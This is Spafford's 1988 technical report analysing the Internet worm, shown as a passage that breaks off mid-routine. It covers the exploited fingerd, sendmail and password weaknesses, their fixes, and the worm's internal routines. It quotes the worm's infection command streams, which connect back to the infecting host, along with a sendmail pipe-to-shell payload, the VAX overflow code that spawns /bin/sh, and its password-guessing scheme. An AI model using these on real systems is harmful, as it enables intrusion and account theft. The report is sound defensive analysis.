The Internet Worm Program: An Analysis
Purdue Technical Report CSD-TR-823
Eugene H. Spafford
Department of Computer Sciences Purdue University
West Lafayette, IN 47907-2004
spaf@cs.purdue.edu
ABSTRACT
On the evening of 2 November 1988, someone infected the Internet
with a worm program. That program exploited flaws in utility
programs in systems based on BSD-derived versions of UNIX. The
flaws allowed the program to break into those machines and copy
itself, thus infecting those systems. This infection eventually
spread to thousands of machines, and disrupted normal activities
and Internet connectivity for many days. This report gives a
detailed description of the components of the worm
program\320data and functions. It is based on study of two
completely independent reverse-compilations of the worm and a
version disassembled to VAX assembly language. Almost no source
code is given in the paper because of current concerns about the
state of the ``immune system'' of Internet hosts, but the
description should be detailed enough to allow the reader to
understand the behavior of the program. The paper contains a
review of the security flaws exploited by the worm program, and
gives some recommendations on how to eliminate or mitigate their
future use. The report also includes an analysis of the coding
style and methods used by the author\(s\) of the worm, and draws
some conclusions about his abilities and intent.
Copyright 1988 by Eugene H. Spafford. All rights reserved.
Permission is hereby granted to make copies of this work, without
charge, solely for the purposes of instruction and research. Any
such copies must include a copy of this title page and copyright
notice. Any other reproduction, publication, or use is strictly
prohibited without express written permission. November 29, 1988
The Internet Worm Program: An Analysis
Purdue Technical Report CSD-TR-823
Eugene H. Spafford
Department of Computer Sciences
Purdue University West Lafayette, IN 47907-2004
spaf@cs.purdue.edu
Introduction
On the evening of 2 November 1988 the Internet came under attack
>From within. Sometime round 6 PM EST, a program was executed on
one or more hosts connected to the Internet. This program
collected host, network, and user information, then broke into
other machines ???using flaws present in those systems' software.
After breaking in, the program would replicate itself and the
replica would also attempt to infect other systems. Although the
program would only infect Sun Microsystems Sun 3 systems, and VAX
computers running variants of 4 BSD UNIX the program spread
quickly, as did the confusion and consternation of system
administrators and users as they discovered that their systems
had been infected. Although UNIX has long been known to have some
security weaknesses \(cf. [Ritc79], [Gram84], and [Reid87]\), the
scope of the breakins came as a great surprise to almost
everyone. he program was mysterious to users at sites where it
appeared. Unusual files were left in the usr/tmp directories of
some machines, and strange messages appeared in the log files of
some of the utilities, such as the sendmail mail handling agent.
The most noticeable effect, however, was that systems became more
and more loaded with running processes as they became repeatedly
infected. As time went on, some of these machines became so
loaded that they were unable to continue any processing; some
machines failed completely when their swap space or process
tables were exhausted. By late Thursday night, personnel at the
University of California at Berkeley and at Massachusetts
Institute of Technology had ``captured'' copies of the program
and began to analyze it. People at other sites also began to
study the program and were developing methods of eradicating it.
A common fear was that the program was somehow tampering with
system resources in a way that could not be readily detected and
that while a cure was being sought, system files were being
altered or information destroyed. By 5 AM EST Thursday morning,
less than 12 hours after the infection started on the network,
the Computer Systems Research Group at Berkeley had developed an
interim set of steps to halt its spread. This included a
preliminary patch to the sendmail mail agent, and the suggestion
to rename one or both of the C compiler and loader to prevent
their use. These suggestions were published in mailing lists and
on the usenet, although their spread was hampered by systems
disconnecting from the Internet to attempt a ``quarantine.''
By about 7 PM EST Thursday, another simple, effective method of
stopping the infection, without renaming system utilities, was
discovered at Purdue and also widely published. Software patches
were posted by the Berkeley group at the same time to mend all
the flaws that enabled the program to invade systems. All that
remained was to analyze the code that caused the problems. On
November 8, the National Computer Security Center held a
hastily-convened workshop in Baltimore. The topic of discussion
was the program and what it meant to the internet community. Who
was at that meeting and why they were invited, and the topics
discussed have not yet been made public.
However, one thing we know that was decided by those present at
the meeting was that they would not distribute copies of their
reverse-engineered code to the general public. It was felt that
the program exploited too many little-known techniques and that
making it generally available would only provide other attackers
a framework to build another such program. Although such a stance
is well-intended, it can serve only as a delaying tactic. As of
November 27, I am aware of at least five versions of the
decompiled code, and because of the widespread distribution of
the binary, I am sure there are at least ten times that many
versions already completed or in progress and the required skills
and tools are too readily available within the community to
believe that only a few groups have the capability to reconstruct
the source code. any system administrators, programmers, and
managers are interested in how the program managed to establish
itself on their systems and spread so quickly These individuals
have valid interest in seeing the code, especially if they are
software vendors. Their interest is not to duplicate the program,
but to be sure that all the holes used by the program are
properly plugged. Furthermore, examining the code may help
administrators and vendors develop defenses against future
attacks, despite the claims to the contrary by some of the
individuals with copies of the reverse-engineered code. This
report is intended to serve an interim role in this process. It
is a detailed description of how the program works, but does not
provide source code that could be used to create a new worm
program. As such, this should be an aid to those individuals
seeking a better understanding of how the code worked, yet it is
in such a form that it cannot be used to create a new worm
without considerable effort. Section 3 and Appendix C contain
specific observations about some of the flaws in the system
exploited by the program, and their fixes. A companion report, to
be issued in a few weeks, will contain a history of the worm's
spread through the Internet. This analysis is the result of a
study performed on three separate reverse-engineered versions of
the worm code. Two of these versions are in C code, and one in
VAX assembler. All three agree in all but the most minor details.
One C version of the code compiles to binary that is identical to
the original code, except for minor differences of no
significance. As such, I can state with some certainty that if
there was only one version of the worm program, then it was
benign in intent. The worm did not write to the file system
except when transferring itself into a target system. It also did
not transmit any information from infected systems to any site,
other than copies of the worm program itself. Since the Berkeley
Computer Systems Research Group as already published official
fixes to the flaws exploited by the program, we do not have to
worry about these specific attacks being used again. Many vendors
have also issued appropriate patches. It now remains to convince
the remaining vendors to issue fixes, and users to install them.
Terminology
There seems to be considerable variation in the names applied to
the program described in this paper. I use the term worm instead
of virus based on its behavior. Members of the press have used
the term virus, possibly because their experience to date has
been only with that form of security problem. This usage has been
reinforced by quotes from computer managers and programmers also
unfamiliar with the terminology. For purposes of clarifying the
terminology, let me define the difference between these two terms
and give some citations to their origins: worm is a program that
can run by itself and can propagate a fully working version of
itself to other machines. It is derived from the word tapeworm, a
parasitic organism that lives inside a host and saps its
resources to maintain itself. virus is a piece of code that adds
itself to other programs, including operating systems. it cannot
run independently and it requires that its ``host'' program be
run to activate it. As such, it has a clear analog to biological
viruses and those viruses are not considered alive in the usual
sense; instead, they invade host cells and corrupt them, causing
them to produce new viruses. The program that was loosed on the
Internet was clearly a worm.
2.1. Worms
The concept of a worm program that spreads itself from machine to
(machine was apparently first described by John Brunner in 1975
in his classic science fiction novel The Shockwave Rider.
[Brun75] He called these programs tapeworms that lived
``inside'' the computers and spread themselves to other
machines. In 1979-1981, researchers at Xerox PARC built and
experimented with worm programs. They reported their experiences
in an article in 1982 in Communications of the ACM. [Shoc82] The
worms built at PARC were designed to travel from machine to
machine and do useful work in a distributed environment. They
were not used at that time to break into systems, although some
did ``get away'' during the tests. A few people seem to prefer to
call the Internet Worm a virus because it was destructive, and
they believe worms are non-destructive. Not everyone agrees that
the Internet Worm was destructive, however. Since intent and
effect are sometimes difficult to judge, using those as a naming
criterion is clearly insufficient. As such, worm continues to be
the clear choice to describe this kind of program.
2.2. Viruses
The first (use of the word virus \(to my knowledge\) to describe
something that infects a computer was by David Gerrold in his
science fiction short stories about the G.O.D. machine. These
stories were later combined and expanded to form the book
When Harlie Was One. [Gerr72] (A subplot in that book described a
program named VIRUS created by an unethical scientist. A
computer infected with VIRUS would randomly dial the phone until
it found another computer. It would then break into that system
and infect it with a copy of VIRUS. This program would infiltrate
the system software and slow the system down so much that it
became unusable except to infect other machines\). The inventor
had plans to sell a program named VACCINE that could cure VIRUS
and prevent infection, but disaster occurred when noise on a
phone line caused VIRUS to mutate so VACCINE ceased to be
effective. The term computer virus was first used in a formal
way by Fred Cohen at USC. [Cohe84] He defined the term to mean
a security problem that attaches itself to other code and turns
it into something that produces viruses; to quote from his
paper: ``We define a computer `virus' as a program that can
infect other programs by modifying them to include a possibly
evolved copy of itself.'' He claimed the first computer virus was
``born'' on November 3, 1983, written by himself for a security
seminar course.
The interested reader may also wish to consult [Denn88] and
[Dewd85] for further discussion of the terms.
3. Flaws and Misfeatures
3.1. Specific Problems
The actions of the Internet Worm exposed some specific security
flaws in standard services provided by BSD-derived versions of
UNIX. Specific patches for these flaws have been widely
circulated in days since the worm program attacked the Internet.
Those flaws and patches are discussed here.
3.1.1. fingerd and gets
The finger program is a utility that allows users to obtain
information about other users. It is usually used to identify
the full name or login name of a user, whether or not a user is
currently logged in, and possibly other information about the
person such as telephone numbers where he or she can be reached.
The fingerd program is intended to run as a daemon, or background
process, to service remote requests using the finger protocol.
[Harr77] The bug exploited to break fingerd involved overrunning
the buffer the daemon used for input. The standard C library has
a few routines that read input without checking for bounds on
the buffer involved. In particular, the gets call takes input to
a buffer without doing any bounds checking; this was the call
exploited by the worm. The gets routine is not the only routine
with this flaw. The family of routines scanf/fscanf/sscanf may
also overrun buffers when decoding input unless the user
explicitly specifies limits on the number of characters to be
converted. Incautious use of the sprintf routine can overrun
buffers. Use of the strcat/strcpy calls instead of the
strncat/strncpy routines may also overflow their buffers.
Although experienced C programmers are aware of the problems with
these routines, they continue to use them. Worse, their format
is in some sense codified not only by historical inclusion in
UNIX and the C language, but more formally in the forthcoming
ANSI language standard for C. The hazard with these calls is
that any network server or privileged program using them may
possibly be compromised by careful precalculation of the
inappropriate input. An important step in removing this hazard
would be first to develop a set of replacement calls that accept
values for bounds on their program-supplied buffer arguments.
Next, all system servers and privileged applications should be
examined for unchecked uses of the original calls, with those
calls then being replaced by the new bounded versions. Note that
this audit has already been performed by the group at Berkeley;
only the fingerd and timed servers used the gets call, and
patches to fingerd have already been posted. Appendix C contains
a new version of fingerd written specifically for this report
that may be used to replace the original version. This version
makes no calls to gets.
3.1.2. Sendmail
The sendmail program is a mailer designed to route mail in a
heterogeneous internetwork. [Allm83] The program operates in a
number of modes, but the one of most interest is when it is
operating as a daemon process. In this mode, the program is
``listening'' on (a TCP port \(#25\) for attempts to deliver
mail using standard Internet protocols, principally SMTP
\(Simple Mail Transfer Protocol\). [Post82] When such a request
is detected, the daemon enters into a dialog with the remote
mailer to determine sender, recipient, delivery instructions, and
message contents. The bug exploited in sendmail had to do with
functionality provided by a debugging option in the code. The
worm would issue the DEBUG command to sendmail and then specify
a set of commands instead of a user address as the recipient of
the message. Normally, this (is not allowed, but it is present
in the debugging code to allow testers to verify that mail is
arriving at a particular site without the need to activate the
address resolution routines. The debug option of sendmail is
often used because of the complexity of configuring the mailer
for local conditions, and many vendors and site administrators
leave the debug option compiled in. The sendmail program is of
immense importance on most Berkeley-derived \(and other\) UNIX
systems because it handles the complex tasks of mail routing and
delivery. Yet, despite its importance and wide-spread use, most
system administrators (know little about how it works. Stories
are often related about how system administrators will attempt to
write new device drivers or otherwise modify the kernel of the
OS, yet they will not willingly attempt to modify sendmail or
its configuration files. It is little wonder, then, that bugs
are present (in sendmail that allow unexpected behavior. Other
flaws have been found and reported now that attention has been
focused on the program, but it is not known for sure if all the
bugs have been discovered and all the patches circulated. One
obvious approach would be to dispose of sendmail and come (up
with a simpler program to handle mail. Actually, for purposes
of verification, developing a suite of cooperating programs
would be a better approach, and more aligned with the UNIX
philosophy. In effect, sendmail is fundamentally flawed, not
because of anything related to function, (but because it is too
complex and difficult to understand.
The Berkeley Computer Systems Research Group has a new version of
sendmail with many bug fixes and fixes for security flaws. This
version of sendmail is available for FTP from the host
``ucbarpa.berkeley.edu'' and will be present in the file
~ftp/pub/sendmail.tar.Z by the end of November 1988. Note that
this version is shipped with the DEBUG option disabled by
default. However, this does not help system administrators who
wish to enable the DEBUG option, although the researchers at
Berkeley believe they have fixed (all the security flaws
inherent in that facility. One approach that could be taken with
the program would be to have it prompt the user for the password
of the super user \(root\) when the DEBUG command is given. A
static password should never be compiled into the program because
(this would mean that the same password might be present at
multiple sites and seldom changed. For those sites without
access to FTP or otherwise unable to obtain the new version, the
official patches to sendmail are enclosed in Appendix D.
3.2. Other Problems
Although the worm exploited flaws in only two server programs,
its behavior has served to illustrate a few fundamental problems
that have not yet been widely addressed. In the interest of
promoting better security, some of these problems are discussed
here. (The interested reader is directed to works such as
[Gram84] for a broader discussion of related issues.
3.2.1. Servers in general
A security flaw not exploited by the worm, but now becoming
obvious, is that many system services have configuration and
command files owned by the same userid. Programs like sendmail,
the at service, and other facilities are often all owned by the
same (non-user id. This means that if it is possible to abuse
one of the services, it might be possible to abuse many. One way
to deal with the general problem is have every daemon and
subsystem run with a separate userid. That way, the command and
data files for each subsystem could (be protected in such a way
that only that subsystem could have write \(and perhaps read\)
access to the files. This is effectively an implementation of
the principle of least privilege. Although doing this might add
an extra dozen user ids to the system, it is a small (cost to
pay, and is already sup ported in the UNIX paradigm. Services
that should have separate ids include sendmail, news, at,
finger, ftp, uucp and YP.
3.2.2. Passwords
A key attack of the worm program involved attempts to discover
user passwords. It was able to determine success because the
encrypted password of each user was in a publicly readable file.
This allows an attacker to encrypt lists of possible passwords
and then compare them against the actual passwords without
passing through any system function. In effect, the security of
the passwords is provided in large part by the prohibitive effort
of trying all combinations of letters. Unfortunately, as machines
get faster, the cost of such attempts decreases. Dividing the
task among multiple processors further reduces the time needed to
decrypt a password. It (is currently feasible to use a
supercomputer to precalculate all probable passwords and store
them on optical media. Although not \(currently\) portable, this
scheme would allow someone with the appropriate resources access
to any account for which they could read the password field and
then consult (their database of pre-encrypted passwords. As the
density of storage media increases, this problem will only get
more severe. A clear approach to reducing the risk of such
attacks, and an approach that has already been taken in some
variants of UNIX, would be to have a (shadow) password file. The
encrypted passwords are saved in a file that is readable only by
the system administrators, and a privileged call performs
password encryptions and comparisons with an appropriate delay
\(.5 to 1 second, for instance\). This would prevent any attempt
to ``fish'' for passwords. Additionally, a threshold could be
included to check for repeated password attempts from the same
process, resulting in some form of alarm being raised. Shadow
password files should be used in combination with encryption
rather than in place of such techniques, however, or one problem
is simply replaced by a different one; the combination of the
two methods is stronger than either one alone. Another way to
strengthen the password mechanism would be to change the utility
that sets user passwords. The utility currently makes minimal
attempt to ensure that new passwords are nontrivial to guess. The
program could be strengthened in such a way that it would reject
any choice of a word currently in the on-line dictionary or based
on the account name.
4. High-Level Description of the Worm
This section contains a high-level overview of how the worm
program functions. The description in this section assumes that
the reader is familiar with UNIX and somewhat familiar with
network facilities under UNIX. Section 5 describes the individual
functions and structures in more detail. The worm consists of
two parts: a main program, and a bootstrap or vector program
\(described in Appendix B\). We will start our description from
the point at which a host is about to be infected. At this
point, a worm running on another machine has either succeeded in
establishing a shell on the new host and has connected back to
the infecting machine via a TCP connection, or it has connected
to the SMTP port and is transmitting to the sendmail program.
The infection proceeded as follows: 1\) A socket was established
on the infecting machine for the vector program to connect to
\(e.g., socket number 32341\). A challenge string was constructed
>From a random number \(e.g., 8712440\). A file name base was
also constructed using a random number \(e.g., 14481910\). 2\)
The vector program was installed and executed using one of two
methods: 2a\) Across a TCP connection to a shell, the worm would
send the following commands \(the two lines beginning with
``cc'' were sent as a single line\):
PATH=/bin:/usr/bin:/usr/ucb cd /usr/tmp echo gorch49; sed '/int
zz/q' > x14481910.c;echo gorch50 [text of vector
program\320enclosed in Appendix B] int zz; cc (-o x14481910
x14481910.c;./x14481910 128.32.134.16 32341 8712440; rm -f
x14481910 x14481910.c;echo DONE
Then it would wait for the string ``DONE'' to signal that the
vector program was running. 2b\) Using the SMTP connection, it
would transmit \(the two lines beginning with ``cc'' were sent
as a single line\):
debug mail from: </dev/null> rcpt to: <"|sed -e '1,/^$/'d |
/bin/sh ; exit 0"> data cd /usr/tmp cat > x14481910.c <<'EOF'
[text of vector program\320enclosed in Appendix III] EOF cc -o
x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440; rm
-f x14481910 x14481910.c . quit
The infecting worm would then wait for up to 2 minutes on
the designated port for the vector to contact it. 3\) The vector
program then connected to the ``server,'' sent the challenge
string, and transferred three files: a Sun 3 binary version of
the worm, a VAX version, and the source code for the vector
program. After the files were copied, the running vector program
became \(via the execl call\) the shell with its input and output
still connected to the server worm. 4\) The server worm sent
the following command stream to the connected shell:
PATH=/bin:/usr/bin:/usr/ucb rm -f sh if [ -f sh ] then
P=x14481910 else P=sh fi
Then, for each binary file it had transferred \(just two in this
case, although the code is written (to allow more\), it would
send the following form of command sequence:
cc -o $P x14481910,sun3.o . /$P -p $$ x14481910,sun3.o
x14481910,vax.o x14481910,l1.c rm -f $P
The rm would succeed only if the linked version of the worm
failed to start execution. If the server determined that the
host was now infected, it closed the connection. Otherwise, it
would try the other binary file. After both binary files had been
tried, it would send over rm commands for the object files to
clear away all evidence of the attempt at infection. 5\) The new
worm on the infected host proceeded to ``hide'' itself by
obscuring its argument vector, unlinking the binary version of
itself, and killing its parent \(the $$ argument in the
invocation\). It then read into memory each of the worm binary
files, encrypted each file after reading it, and deleted the
files from disk. 6\) Next, the new worm gathered information
about network interfaces and hosts to which the local machine
was connected. It built lists of these in memory, including
information about canonical and alternate names and addresses.
It gathered some of this information by making direct
ioctl calls, and by running the netstat program with various
arguments. It also read through various system files looking for
host names to add to its database. 7\) It randomized the lists
it constructed, then attempted to infect some of those hosts. For
directly connected networks, it created a list of possible host
numbers and attempted to infect those hosts if they existed.
Depending on the type of host \(gateway or local network\), the
worm first tried to establish a connection on the telnet or rexec
ports to determine reachability before it attempted one of the
infection methods. 8\) The infection attempts proceeded by one
of three routes: rsh, fingerd, or sendmail. 8a\) The attack via
rsh was done by attempting to spawn a remote shell by invocation
of \(in order of trial\) /usr/ucb/rsh, /usr/bin/rsh, and
/bin/rsh. If successful, the host was infected as in steps 1 and
2a, above. 8b\) The attack via the finger daemon was somewhat
more subtle. A connection was established to the remote finger
server daemon and then a specially constructed string of 536
bytes was passed to the daemon, overflowing its input buffer and
overwriting parts of the stack. For standard 4 BSD versions
running on VAX computers, the overflow resulted in the return
stack frame for the main routine being changed so that the
return address pointed into the buffer on the stack. The
instructions that were written into the stack at that location
were: pushl $68732f '/sh\\0' pushl $6e69622f '/bin' movl sp,
r10 pushrl $0 pushrl $0 pushrl r10 pushrl $3 movl sp,ap
chmk $3b That (is, the code executed when the main routine
attempted to return was: execve\("/bin/sh", 0, 0\) On VAXen,
this resulted in the worm connected to a remote shell via the TCP
connection. The worm then proceeded to infect the host as in
steps 1 and 2a, (above. On Suns, this simply resulted in a core
file since the code was not in place to corrupt a Sun version of
fingerd in a similar fashion. 8c\) The worm then tried to infect
the remote host by establishing a connection to the SMTP port
and mailing an (infection, as in step 2b, above. Not all the
steps were attempted. As soon as one method succeeded, the host
entry in the internal list was marked as infected and the other
methods were not attempted. 9\) Next, it entered a state machine
consisting of five states. Each state (was run for a short
while, then the program looped back to step #7 \(attempting to
break into other hosts via sendmail, finger, or rsh \). The first
four of the five states were attempts to break into user
accounts on the local machine. The fifth state was the final
state, and occurred after all attempts had been made to break
all passwords. In the fifth state, the worm looped forever
trying to infect hosts in its internal tables and marked as not
yet infected. The four states were: 9a\) The worm read through
the /etc/hosts.equiv files and /.rhosts files to find the names
of equivalent hosts. These were marked in the internal table of
hosts. Next, the worm read the /etc/passwd file into an internal
data structure. As it was doing this, it also examined
the .forward file in each user home directory and included those
host names in its internal table of hosts to try. Oddly, it did
not similarly check user .rhosts files. 9b\) The worm attempted
to break each user password using simple choices. The worm
checked the obvious case of no password. Then, it used the
account name and GECOS field to try simple passwords. Assume
that the user had an entry in the password file like:
account:abcedfghijklm:100:5:User, Name:/usr/account:/bin/sh then
the words tried as potential passwords would be account,
accountaccount, User, Name, user, name, and tnuocca. These are,
respectively, the account name, the account name concatenated
with itself, the first and last names of the user, the user
names with leading capital letters turned to lower case, and the
account name reversed. Experience described in [Gram84]
indicates that on systems where users are naive about password
security, these choices may work for up to 30% of user passwords.
Step 10 in this section describes what was done if a password
``hit'' was achieved. 9c\) The third stage in the process
involved trying to break the password of each user by trying
each word present in an internal dictionary of words \(see
Appendix I\). This dictionary of 432 words was tried against
each account in a random order, with ``hits'' being handled as
described in step 10, below. 9d\) The fourth stage was entered
if all other attempts failed. For each word in the file
/usr/dict/words, the worm would see if it was the password to any
account. In addition, if the word in the dictionary began with an
upper case letter, the letter was converted to lower case and
that word was also tried against all the passwords. 10\) Once a
password was broken for any account, the worm would attempt to
break into remote machines where that user had accounts. The
worm would scan the .forward and .rhosts files of the user at
this point, and identify the names of remote hosts that had
accounts used by the target user. It then attempted two attacks:
10a\) The worm would first attempt to create a remote shell using
the rexec service. The attempt would be made using the account
name given in the .forward or .rhosts file and the user's local
password. This took advantage of the fact that users often have
the same password on their accounts on multiple machines. 10b\)
The worm would do a rexec to the current host \(using the local
user name and password\) and would try a rsh command to the
remote host using the username taken from the file. This attack
would succeed in those cases where the remote machine had a
hosts.equiv file or the user had a .rhosts file that allowed
remote execution without a password. If the remote shell was
created either way, the attack would continue as in steps 1 and
2a, above. No other use was made of the user password.
Throughout the execution of the main loop, the worm would check
for other worms running on the same machine. To do this, the worm
would attempt to connect to another worm on a local,
predetermined TCP socket.
9
If such a connection succeeded, one worm would \(randomly\) set its
pleasequit variable to 1, causing that worm to exit after it had
reached partway into the third stage of password cracking. This
delay is part of the reason many systems had multiple worms
running: even though a worm would check for other local worms, it
would defer its self-destruction until significant effort had
been made to break local passwords. One out of every seven worms
would become immortal rather than check for other local worms.
This was probably done to defeat any attempt to put a fake worm
process on the TCP port to kill existing worms. It also
contributed to the load of a machine once infected. The worm
attempted to send an UDP packet to the host ernie.berkeley.edu
10
approximately once every 15 infections, based on a random number
comparison. The code to do this was incorrect, however, and no
information was ever sent. Whether this was the intended ruse or
whether there was actually some reason for the byte to be sent is
not currently known. However, the code is such that an
uninitialized byte is the intended message. It is possible that
the author eventually intended to run some monitoring program on
ernie \(after breaking into an account, no doubt\). Such a
program could obtain the sending host number from the single-byte
message, whether it was sent as a TCP or UDP packet. However, no
evidence for such a program has been found and it is possible
that the connection was simply a feint to cast suspicion on
personnel at Berkeley. The worm would also fork itself on a
regular basis and kill its parent. This served two purposes.
First, the worm appeared to keep changing its process id and no
single process accumulated excessive amounts of cpu time.
Secondly, processes that have been running for a long time have
their priority downgraded by the scheduler. By forking, the new
process would regain normal scheduling priority. This mechanism
did not always work correctly, either, as we locally observed
some instances of the worm with over 600 seconds of accumulated
cpu time. If the worm ran for more than 12 hours, it would flush
its host list of all entries flagged as being immune or already
infected. The way hosts were added to this list implies that a
single worm might reinfect the same machines every 12 hours.
5. A Tour of the Worm
The following is a brief, high-level description of the routines
present in the worm code. The description covers all the
significant functionality of the program, but does not describe
all the auxiliary routines used nor does it describe all the
parameters or algorithms involved. It should, however, give the
user a complete view of how the worm functioned.
5.1. Data Structures
The worm had a few global data structures worth mentioning.
Additionally, the way it handled some local data is of interest.
5.1.1. Host list
The worm constructed a linked list of host records. Each record
contained an array of 12 character pointers to allow storage of
up to 12 host names/aliases. Each record also contained an array
of six long unsigned integers for host addresses, and each record
contained a flag field. The only flag bits used in the code
appear to be 0x01 \(host was a gateway\), 0x2 \(host has been
infected\), 0x4 \(host cannot be infected \320 not reachable, not
UNIX, wrong machine type\), and 0x8 \(host was ``equivalent'' in
the sense that it appeared in a context like .rhosts file\).
5.1.2. Gateway List
The worm constructed a simply array of gateway IP addresses
through the use of the system netstat command. These addresses
were used to infect directly connected networks. The use of the
list is described in the explanation of scan_gateways and
rt_init, below.
5.1.3. Interfaces list
An array of records was filled in with information about each
network interface active on the current host. This included the
name of the interface, the outgoing address, the netmask, the
destination host if the link was point-to-point
11
, and the interface flags.
5.1.4. Pwd
A linked list of records was built to hold user information. Each
structure held the account name, the encrypted password, the
home directory, the gecos field, and a link to the next record.
A blank field was also allocated for decrypted passwords as they
were found.
5.1.5. objects
The program maintained an array of ``objects'' that held the
files that composed the worm. Rather than have the files stored
on disk, the program read the files into these internal
structures. Each record in the list contained the suffix of the
file name \(e.g., ``sun3.o''\), the size of the file, and the
encrypted contents of the file. The use of this structure is
described below.
5.1.6. Words
A mini-dictionary of words was present in the worm to use in
password guessing \(see Appendix A\). The words were stored in
an array, and every word was masked \(XOR\) with the bit pattern
0x80. Thus, the dictionary would not show up with an invocation
of the strings program on the binary or object files.
5.1.7. Embedded Strings
Every text string used by the program, without exception, was
masked \(XOR\) with the bit pattern 0x81. Every time a string
was referenced, it was referenced via a call to XS. The XS
function decrypted the requested string in a static circular
buffer and returned a pointer to the decrypted version. This
also kept any of the text strings in the program from appearing
during an invocation of strings. Simply clearing the high order
bit \(e.g., XOR 0x80\) or displaying the program binary would
not produce intelligible text. All references to XS have been
omitted from the following text; realize that every string was
so encrypted. It is not evident how the strings were placed in
the program in this manner. The masked strings were present
inline in the code, so some preprocessor or a modified version of
the compiler must have been used. This represents a significant
effort by the author of the worm, and suggests quite strongly
that the author wanted to complicate or prevent the analysis of
the program once it was discovered.
5.2. Routines
The descriptions given here are arranged in alphabetic order. The
names of some routines are exactly as used by the author of the
code. Other names are based on the function of the routine, and
those names were chosen because the original routines were
declared static and name information was not present in the
object files. If the reader wishes to trace the functional \257ow
of the worm, begin with the descriptions of routines main and
doit \(presented first for this reason\). By function, the
routines can be \(arbitrarily\) grouped as follows: setup and
utility : main, doit, crypt, h_addaddr, h_addname, h_addr2host,
h_clean, h_name2host, if_init, loadobject, makemagic, netmaskfor,
permute, rt_init, supports_rsh, and supports_telnet. network &
password attacks : attack_network, attack_user, crack_0, crack_1,
crack_2, crack_3, cracksome, ha, hg, hi, hl, hul, infect,
scan_gateways, sendworm, try_fingerd, try_password, try_rsh,
try_sendmail, and waithit. camouflage: checkother, other_sleep,
send_message, and xorbuf.
5.2.1. main
This was where the program started. The first thing it did was
change its argument vector to make it look like it was the shell
running. Next, it set its resource limits so a failure would not
drop a core file. Then it loaded all the files named on the
command line into the object structure in memory using calls to
loadobject. If the file was not one of the objects loaded, the
worm would immediately call exit. Next, the code unlinked all the
object files, the file named sh \(the worm itself\), and the file
/tmp/.dumb \(apparently a remnant of some earlier version of the
program, possibly used as a restraint or log during
testing\320the file is not otherwise referenced\). The program
then finished zeroing out the argument vector. Next, the code
would call if_init. If no interfaces were discovered by that
routine, the program would call exit. The program would then get
its current process group. If the process group was the same as
its parent process id \(passed on the command line\), it would
reset its process group and send a KILL signal to its parent.
Last of all, the routine doit was invoked.
5.2.2. doit
This was the main worm code. First, a variable was set to the
current time with a call to time, and the random number generator
was initialized with the return value. Next, the routines hg and
hl were invoked to infect some hosts. If one or both of these
failed to infect any hosts, the routine ha was invoked. Next, the
routine checkother was called to see if other worms were on this
host. The routine send_message was also called to cast suspicion
on the folks at Berkeley.
12
The code then entered an infinite loop: A call would be made to
cracksome followed by a call to other_sleep with a parameter of
30. Then cracksome would be called again. At this point, the
process would fork itself, and the parent would exit, leaving the
child to continue. Next, the routines hg, ha, and hi would all be
called to infect other hosts. If any one \(or combination\) of
these routines failed to infect a new host, the routine hl would
be called to infect a local host. Thus, the code was aggressive
about always infecting at least one host each pass through this
loop. The logic here was faulty, however, because if all known
gateway hosts were infected, or a bad set of host numbers were
tried in ha, this code would call hl every time through the loop.
Such behavior was one of the reasons hosts became overloaded with
worm processes: every pass through the loop, each worm would
likely be forced to infect another local host. Considering that
multiple worms could run on a host for some time before one would
exit, this could lead to an exponential growth of worms in a LAN
environment. Next, the routine other_sleep was called with a
timeout of 120. A check was then made to see if the worm had run
for more than 12 hours. If so, a call was made to h_clean.
Finally, a check was made of the pleasequit and nextw variables
\(set in other_sleep or checkother, and crack_2, respectively\).
If pleasequit was nonzero, and nextw was greater than 10, the
worm would exit.
5.2.3. attack_network
This routine was designed to infect random hosts on a subnet.
First, for each of the network interfaces, if checked to see if
the target host was on a network to which the current host was
directly connected. If so, the routine immediately returned.
13
Based on the class of the netmask \(e.g., Class A, Class B\), the
code constructed a list of likely network numbers. A special
algorithm was used to make good guesses at potential Class A host
numbers. All these constructed host numbers were placed in a
list, and the list was then randomized using permute. If the
network was Class B, the permutation was done to favor low-
numbered hosts by doing two separate permutations\320the first
six hosts in the output list were guaranteed to be chosen from
the first dozen \(low-numbered\) host numbers generated. The
first 20 entries in the permuted list were the only ones
examined. For each such IP address, its entry was retrieved from
the global list of hosts \(if it was in the list\). If the host
was in the list and was marked as already infected or immune, it
was ignored. Otherwise, a check was made to see if the host
supported the rsh command \(identifying it as existing and having
BSD-derived networking services\) by calling supports_rsh. If the
host did support rsh, it was entered into the hosts list if not
already present, and a call to infect was made for that host. If
a successful infection occurred, the routine returned early with
a value of TRUE \(1\).
5.2.4. attack_user
This routine was called after a user password was broken. It has
some incorrect code and may not work properly on every
architecture because a subroutine call was missing an argument.
However, on Suns and VAXen, the code will work because the
missing argument was supplied as an extra argument to the
previous call, and the order of the arguments on the stack
matches between the two routines. It was largely a coincidence
that this worked. The routine attempted to open a .forward file
in the the user's home directory, and then for each host and user
name present in that file, it called the hul routine. It then did
the same thing with the .rhosts file, if present, in the user's
home directory.
5.2.5. checkother
This routine was to see if another worm was present on this
machine and is a companion routine to other_sleep. First, a
random value was checked: with a probability of 1 in 7, the
routine returned without ever doing anything\320these worms
become immortal in the sense that they never again participated
in the process of thinning out multiple local worms. Otherwise,
the worm created a socket and tried to connect to the local
``worm port''\320 23357. If the connection was successful, an
exchange of challenges was made to verify that the other side was
actually a fellow worm. If so, a random value was written to the
other side, and a value was read from the socket. If the sum of
the value sent plus the value read was even, the local worm set
its pleasequit variable to 1, thus marking it for eventual self-
destruction. The socket was then closed, and the worm opened a
new socket on the same port \(if it was not destined to self-
destruct\) and set other_fd to that socket to listen for other
worms. If any errors were encountered during this procedure, the
worm involved set other_fd to -1 and it returned from the
routine. This meant that any error caused the worm to be
immortal, too.
5.2.6. crack_0
This routine first scanned the /etc/hosts.equiv file, adding new
hosts to the global list of hosts and setting the \257ags field
to mark them as equivalent. Calls were made to name2host and
getaddrs. Next, a similar scan was made of the /.rhosts file
using the exact same calls. The code then called setpwent to open
the /etc/passwd file. A loop was performed as long as passwords
could be read: Every 10th entry, a call was made to other_sleep
with a timeout of 0. For each user, an attempt was made to open
the file .forward
14
in the home directory of that user, and read the hostnames
therein. These hostnames were also added to the host list and
marked as equivalent. The encrypted password, home directory, and
gecos field for each user was stored into the pwd structure.
After all user entries were read, the endpwent routine was
invoked, and the cmode variable was set to 1.
5.2.7. crack_1
This routine tried to break passwords. It looped until all
accounts had been tried, or until the next group of 50 accounts
had been tested. In the loop: A call was made to other_sleep with
